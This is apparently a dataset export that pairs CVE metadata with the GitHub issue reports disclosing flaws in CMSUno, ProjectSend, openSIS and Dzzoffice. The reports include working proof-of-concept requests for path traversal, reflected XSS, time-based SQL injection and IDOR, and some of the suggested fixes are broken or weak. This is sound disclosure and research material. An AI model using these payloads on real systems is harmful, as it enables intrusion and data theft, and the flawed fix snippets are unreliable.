cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2021-40889
2021-10-11T10:15:07.697
CMSUno version 1.7.2 is affected by a PHP code execution vulnerability. sauvePass action in {webroot}/uno/central.php file calls to file_put_contents() function to write username in password.php file when a user successfully changed their password. The attacker can inject malicious PHP code into password.php and then use the login function to execute code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/boiteasite/cmsuno/issues/19" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/boiteasite/cmsuno/issues/19" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cmsuno_project:cmsuno:1.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "52C39F4E-947F-4A8D-950F-D5FFDD33D12C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/boiteasite/cmsuno/issues/19
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "boiteasite", "cmsuno" ]
Dear @boiteasite, I found a security problem can lead to remote code execution in CMSUno version 1.7.2 # Description: `sauvePass` action in `{webroot}/uno/central.php` file call to `file_put_contents()` function to write username to `password.php` file when user successfully changed password, Becase of filter without ` ' , " , ; , (), ...` the attacker can inject malicious php code into password.php ![image](https://i.imgur.com/8Kd6UPy.png) # PoC: ![Image](https://i.imgur.com/yazjzDZ.png) ![image](https://user-images.githubusercontent.com/54875703/132621238-decc9add-0a35-4ebc-9443-9be06bf93bf0.png) When submit username and password, php code will be executed ![Image](https://i.imgur.com/bJso0gx.png)
PHP Code Execution via change password function
https://api.github.com/repos/boiteasite/cmsuno/issues/19/comments
2
2021-09-09T04:11:04Z
2021-09-10T13:33:35Z
https://github.com/boiteasite/cmsuno/issues/19
991,735,498
19
2,677
CVE-2021-40884
2021-10-11T11:15:09.547
Projectsend version r1295 is affected by sensitive information disclosure. Because of not checking authorization in ids parameter in files-edit.php and id parameter in process.php function, a user with uploader role can download and edit all files of users in application.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 5.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/projectsend/projectsend/issues/992" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/projectsend/projectsend/issues/992" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:projectsend:projectsend:r1295:*:*:*:*:*:*:*", "matchCriteriaId": "2AF6F056-67CB-4B19-8673-8E59E95AAFF4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "862" ]
862
https://github.com/projectsend/projectsend/issues/992
[ "Exploit", "Third Party Advisory" ]
github.com
[ "projectsend", "projectsend" ]
Dear @ignacionelson, @kwadrat , I have found an IDOR vulnerability in `Files` function. # Description Because of not checking authorization at `ids` parameter in `files-edit.php` and `id` parameter in `process.php`, The user with uploader role can `download`,`edit` all files of users in application # To Reproduce # Download file 1. Access url `/process.php?do=download&id=` url 2. Add value for `id` parameter from `1` -> `...` to download all files in application ![image](https://user-images.githubusercontent.com/54875703/132287142-1b11b727-dad5-4633-87e0-d66e2bcbe405.png) # Edit File 1. Access url `/files-edit.php?ids=` 2. Add value for id parameter from `1` -> `...` to edit all files in application Files of user `kietna` on application ![image](https://user-images.githubusercontent.com/54875703/132287331-e6a18fdd-c9d2-47ae-92e9-c342cfafa309.png) User `kietna` edit private file of `admin` user ![image](https://user-images.githubusercontent.com/54875703/132287385-d4f0be4b-ba38-4a88-9dd5-bf8f4a823e4c.png) ![image](https://user-images.githubusercontent.com/54875703/132287414-60882fa6-89a4-494e-ac64-9e9bcc84771d.png) ![image](https://user-images.githubusercontent.com/54875703/132287506-e0817f7a-16d0-4b1d-93c5-2b91a2d384e0.png) # Solution You need to check authorization for `id` and `ids` parameters, make sure that a user on the system can only interact with that user's files
Insecure Direct Object Reference in Files function
https://api.github.com/repos/projectsend/projectsend/issues/992/comments
0
2021-09-07T05:13:56Z
2021-09-07T05:22:44Z
https://github.com/projectsend/projectsend/issues/992
989,600,409
992
2,678
CVE-2021-40886
2021-10-11T11:15:09.590
Projectsend version r1295 is affected by a directory traversal vulnerability. A user with Uploader role can add value `2` for `chunks` parameter to bypass `fileName` sanitization.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/projectsend/projectsend/issues/993" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/projectsend/projectsend/issues/993" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:projectsend:projectsend:r1295:*:*:*:*:*:*:*", "matchCriteriaId": "2AF6F056-67CB-4B19-8673-8E59E95AAFF4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/projectsend/projectsend/issues/993
[ "Exploit", "Third Party Advisory" ]
github.com
[ "projectsend", "projectsend" ]
Dear @ignacionelson, I found a Path traversal vulnerability on your application! # Description Because of not checking if clause for `chunks` parameter when `chunks` >= 2, the user with Uploader role can add value `2` for `chunks` param to bypass `fileName` sanitizer ![Image](https://i.imgur.com/UYgOuaJ.png) - In Step 1: 3 parameter that I can control when using upload function `chunk`, `chunks`, `fileName` - In Step 2: The if clause check if `chunks` parameter < `2`, the `fileName` parameter will be handled. So i add value `2` for `chunks` param then it will pass Step 2 and go to Step 3 ![image](https://user-images.githubusercontent.com/54875703/132298897-8751bf58-4a2e-4e89-a2bd-ddb7c3e4ced0.png) if i don't add value for `chunk` then the `chunk` parameter goes to `0` and add value `2` for `chunks` parameter, i can pass this if # Step To Reproduce 1. Use burpsuite to capture upload request 2. Change valuable of `chunks` parameter to `2` and add dot dot for `name` parameter to escape root directory 3. The file was uploaded in webroot directory with `index.html.part` name ![image](https://user-images.githubusercontent.com/54875703/132299904-a8c6239d-14bd-4529-a213-7411ccefabe1.png) # Request: ``` POST /includes/upload.process.php HTTP/1.1 Host: 172.16.0.12:4444 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------4677942761162401681381669887 Content-Length: 2817 Origin: http://172.16.0.12:4444 Connection: close Referer: http://172.16.0.12:4444/upload.php Cookie: PHPSESSID=7simdbjnrvdjpeq6bkvfukrdvt; -----------------------------4677942761162401681381669887 Content-Disposition: form-data; name="name" ../../csrf.html -----------------------------4677942761162401681381669887 Content-Disposition: form-data; name="chunks" 2 -----------------------------4677942761162401681381669887 Content-Disposition: form-data; name="file"; filename="blob" Content-Type: application/octet-stream <img src=x onerror=alert(1);> -----------------------------4677942761162401681381669887-- ``` # Solutions: Add if clause to check when `chunks` parameter >= `2`
Path traversal in Upload file function
https://api.github.com/repos/projectsend/projectsend/issues/993/comments
4
2021-09-07T07:07:48Z
2023-01-19T20:50:48Z
https://github.com/projectsend/projectsend/issues/993
989,664,282
993
2,679
CVE-2021-40887
2021-10-11T11:15:09.633
Projectsend version r1295 is affected by a directory traversal vulnerability. Because of lacking sanitization input for files[] parameter, an attacker can add ../ to move all PHP files or any file on the system that has permissions to /upload/files/ folder.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/projectsend/projectsend/issues/994" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/projectsend/projectsend/issues/994" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:projectsend:projectsend:r1295:*:*:*:*:*:*:*", "matchCriteriaId": "2AF6F056-67CB-4B19-8673-8E59E95AAFF4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/projectsend/projectsend/issues/994
[ "Exploit", "Third Party Advisory" ]
github.com
[ "projectsend", "projectsend" ]
Dear @ignacionelson , I found a Path traversal vulnerability in import-orphans.php # Description Becase of lacking sanitization input for `files[]` parameter, The attacker can add `../` to move all of php files or any file on the system that has permissions to `/upload/files/` folder ![image](https://i.imgur.com/zWPCLJY.png) # Step To Reproduce 1. Using burpsuite tool to capture request of import-orphans.php function 2. Adding `../../[file name want to move]` in `files[]` parameter, in this step the attacker can move php files with the aim of sabotaging the system or read sentitive file in system like `passwd, access log, ...` 3. Then access `webroot/import-orphans.php` to get a new name of file ![image](https://user-images.githubusercontent.com/54875703/132315237-7eae3784-45f1-4539-8272-b825c5d619cb.png) 4. Then access `webroot/upload/files/[new name of file]` # Request move `index.php` file ``` POST /import-orphans.php HTTP/1.1 Host: 172.16.0.12:4444 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------41162972056717011663508504951 Content-Length: 388 Origin: http://172.16.0.12:4444 Connection: close Referer: http://172.16.0.12:4444/import-orphans.php Cookie: PHPSESSID=7simdbjnrvdjpeq6bkvfukrdvt; Upgrade-Insecure-Requests: 1 -----------------------------41162972056717011663508504951 Content-Disposition: form-data; name="csrf_token" ccc780a3231d3f7544fe9eaa9f3aea28756bdbfd1df824b726865ebaf1505fa1 -----------------------------41162972056717011663508504951 Content-Disposition: form-data; name="files[]" ../../index.php -----------------------------41162972056717011663508504951-- ``` ![image](https://user-images.githubusercontent.com/54875703/132316953-c205dcf1-33f9-4532-9963-aa2b7653245a.png) Then `webroot` returned Directory Listing because of moving `index.php` file to `/upload/files` folder ![image](https://user-images.githubusercontent.com/54875703/132317035-2a841f5a-e77a-4713-b4da-351aeeb2d275.png) # Solution: ``` if(preg_match('/.\.\/',$_POST['files'] === 1){ die(); } ```
Path Traversal vulnerability in import-orphans.php
https://api.github.com/repos/projectsend/projectsend/issues/994/comments
18
2021-09-07T09:04:17Z
2024-05-10T10:25:40Z
https://github.com/projectsend/projectsend/issues/994
989,761,035
994
2,680
CVE-2021-40888
2021-10-11T11:15:09.673
Projectsend version r1295 is affected by Cross Site Scripting (XSS) due to lack of sanitization when echo output data in returnFilesIds() function. A low privilege user can call this function through process.php file and execute scripting code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/projectsend/projectsend/issues/995" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/projectsend/projectsend/releases/tag/r1295" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/projectsend/projectsend/issues/995" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/projectsend/projectsend/releases/tag/r1295" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:projectsend:projectsend:r1295:*:*:*:*:*:*:*", "matchCriteriaId": "2AF6F056-67CB-4B19-8673-8E59E95AAFF4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/projectsend/projectsend/issues/995
[ "Exploit", "Third Party Advisory" ]
github.com
[ "projectsend", "projectsend" ]
Dear @ignacionelson, I found a vulnerability that execute malicious script of user, # Description: Because of lacking of sanitizer when echo output data in returnFilesIds() function in `{webroot}/includes/Classes/Download.php` , the low privilege user (Uploader role) can call this function through process.php file and execute scripting code ![Image](https://i.imgur.com/AxlLTWC.png) ![Image](https://i.imgur.com/MwWzphp.png) # PoC: `{webroot}/process.php?do=return_files_ids&files[0][name]=x&files[0][value]=23"><img src=x onerror=alert(1);>` ![Image](https://i.imgur.com/qAuvkbk.png) # Solutions: ``` public function returnFilesIds($file_ids) { $this->check_level = array(9,8,7,0); if (isset($file_ids)) { // do a permissions check for logged in user if (current_role_in($this->check_level)) { $file_list = array(); foreach($file_ids as $key => $data) { $file_list[] = $data['value']; } ob_clean(); flush(); $return = implode( ',', $file_list ); } else { return false; } } else { return false; } echo htmlentities($return) // fixed in here, html encoding prevent xss; } ```
Reflected Cross-site Scripting in returnFilesIds() function
https://api.github.com/repos/projectsend/projectsend/issues/995/comments
1
2021-09-08T02:13:10Z
2021-09-10T13:43:02Z
https://github.com/projectsend/projectsend/issues/995
990,591,132
995
2,681
CVE-2021-40542
2021-10-11T13:15:07.417
Opensis-Classic Version 8.0 is affected by cross-site scripting (XSS). An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/189" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/189" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "20B5286C-4CFF-4710-8D23-C76669FADFE7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/OS4ED/openSIS-Classic/issues/189
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "OS4ED", "openSIS-Classic" ]
# Description: Because of lacking of sanitizer of input data at `$_REQUEST['link_url']` in `Ajax_url_encode.php` file, The Unauthenticated user can inject and execute javascript code on `link_url` parameter ![image](https://user-images.githubusercontent.com/54875703/131649372-9f2c37d6-31e0-471e-b515-90d8410e6d43.png) Testing on local site: ![image](https://user-images.githubusercontent.com/54875703/131649432-7d5edb12-a593-4b77-9497-5ee890808d30.png) Testing on demo site: ![image](https://user-images.githubusercontent.com/54875703/131649469-e857296c-cc7c-420d-97cd-6ab179cb8747.png) # To Reproduce ## XSS 1 Steps to reproduce the behavior: 1. Acess `Ajax_url_encode.php` file 2. Add `?link_url=[malicious script in here]` behind `Ajax_url_encode.php` file 3. The backend will echo and execute malicious script ### Request ``` GET /Ajax_url_encode.php?link_url=%3Cimg%20src=x%20onerror=alert(1);%3E HTTP/1.1 Host: 172.16.0.12:2222 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: PHPSESSID=mebdcag3g6jknfb8edrmee7ijp Upgrade-Insecure-Requests: 1 ``` ### Response ``` HTTP/1.1 200 OK Date: Wed, 01 Sep 2021 09:38:31 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.21 X-Powered-By: PHP/7.4.21 Content-Length: 31 Connection: close Content-Type: text/html; charset=UTF-8 <img src=x onerror=alert(1);> ``` # Solution: use `htmlentities()` function when echo the output ``` echo htmlentities($encoded_url); ```
Unauthenticated Reflect Cross-site Scripting in Ajax_url_encode.php file
https://api.github.com/repos/OS4ED/openSIS-Classic/issues/189/comments
2
2021-09-01T09:41:11Z
2021-09-17T15:03:17Z
https://github.com/OS4ED/openSIS-Classic/issues/189
984,935,542
189
2,682
CVE-2021-40543
2021-10-11T13:15:07.457
Opensis-Classic Version 8.0 is affected by a SQL injection vulnerability due to a lack of sanitization of input data at two parameters $_GET['usrid'] and $_GET['prof_id'] in the PasswordCheck.php file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/191" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/191" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "20B5286C-4CFF-4710-8D23-C76669FADFE7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/OS4ED/openSIS-Classic/issues/191
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "OS4ED", "openSIS-Classic" ]
# Description: Because of lacking of sanitizer of input data at two parameters `$_GET['usrid']` and `$_GET['prof_id']` in `PasswordCheck.php` file, The Unauthenticated user can inject sql code and get all informations in database ![image](https://user-images.githubusercontent.com/54875703/131659500-dce4d9f4-d531-4635-ae99-db333e005aa2.png) Use sqlmap tool dump users of database ![image](https://user-images.githubusercontent.com/54875703/131659600-b2ca64eb-cbf4-484a-88e1-c0e93788a091.png) # To Reproduce ## SQL INJECTION Steps to reproduce the behavior: 1. Acess `PasswordCheck.php` file 2. Add `?password=P@a&usrid=[inject sql code in here]&prof_id=[inject sql code in here]` behind `PasswordCheck.php` file ### Request ``` GET /PasswordCheck.php?password=P@a&usrid=1&prof_id=1%27%20AND%20(SELECT%209714%20FROM%20(SELECT(SLEEP(5)))vGYX)--%20- HTTP/1.1 Host: 172.16.0.12:2222 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: PHPSESSID=bcq1n5bpstl0b93h22v51uv2sc Upgrade-Insecure-Requests: 1 ``` ### Response ``` HTTP/1.1 200 OK Date: Wed, 01 Sep 2021 10:46:49 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.21 X-Powered-By: PHP/7.4.21 Content-Length: 2 Connection: close Content-Type: text/html; charset=UTF-8 0 ``` # Solution: use `sqlSecurityFilter()` function in `functions/SqlSecurityFnc.php` ``` include("functions/SqlSecurityFnc.php"); $usrid = sqlSecurityFilter($_GET['usrid']); $res_pass_chk = DBGet(DBQuery("SELECT * FROM login_authentication WHERE PASSWORD = '".md5($_GET['password'])."' AND USERNAME!='".$usrid."' AND PROFILE_ID!='".intval($_GET['prof_id'])."'")); ```
Unauthenticated SQL Injection in PasswordCheck.php file
https://api.github.com/repos/OS4ED/openSIS-Classic/issues/191/comments
3
2021-09-01T10:55:25Z
2021-10-30T09:57:08Z
https://github.com/OS4ED/openSIS-Classic/issues/191
985,003,822
191
2,683
CVE-2021-40191
2021-10-11T14:15:07.600
Dzzoffice Version 2.02.1 is affected by cross-site scripting (XSS) due to a lack of sanitization of input data at all upload functions in webroot/dzz/attach/Uploader.class.php and return a wrong response in content-type of output data in webroot/dzz/attach/controller.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
